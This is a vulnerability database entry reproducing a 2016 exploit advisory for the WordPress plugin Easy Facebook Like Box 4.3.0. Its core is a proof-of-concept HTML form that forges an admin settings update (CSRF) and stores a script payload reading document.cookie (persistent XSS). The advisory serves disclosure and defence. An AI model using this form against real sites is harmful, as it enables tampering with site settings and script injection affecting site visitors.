Lucene search
K

WordPress Easy Facebook Like Box 4.3.0 CSRF / XSS

🗓️ 20 Nov 2016 00:00:00Reported by Mojtaba MobhaMType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 37 Views

WordPress Easy Facebook Like Box 4.3.0 CSRF / XSS vulnerability, allows for Cross-Site Request Forgery and Persistent Cross-Site Scriptin

Code
`######################  
# Exploit Title : WordPress Plugin Easy Facebook Like Box 4.3.0- Cross-Site Request Forgery / Persistent Cross-Site Scripting  
# Exploit Author : Persian Hack Team  
# Vendor Homepage : https://wordpress.org/plugins/easy-facebook-likebox/  
# Category: [ Webapps ]  
# Tested on: [ Win ]  
# Version: 4.3.0  
# Date: 2016/11/19  
######################  
#  
# PoC:  
# CSRF and stored XSS vulnerability in Wordpress plugin Easy Facebook Like Box 4.3.0  
# The Code for CSRF.html is :  
  
<form method="post" action="http://localhost/wp/wp-admin/options.php">  
Like box pup up settings  
</br>  
<input type='hidden' name='option_page' value='efbl_settings_display_options' />  
<input type="hidden" name="action" value="update" />  
<input type="hidden" id="_wpnonce" name="_wpnonce" value="aa27b52873" />  
<input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/admin.php?page=easy-facebook-likebox&tab=autopopup" />  
</br>  
Enable PopUp<input type="checkbox" id="efbl_enable_popup" name="efbl_settings_display_options[efbl_enable_popup]" value="1" checked />  
</br>  
PopUp content<textarea id="efbl_popup_shortcode" name="efbl_settings_display_options[efbl_popup_shortcode]" rows="5" cols="50" placeholder="">  
For Testing D:<script>alert(document.cookie)</script></textarea><br />  
</br>  
<input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes" />  
</form>   
  
#  
######################  
# Discovered by : Mojtaba MobhaM  
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members  
# Homepage : http://persian-team.ir  
######################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation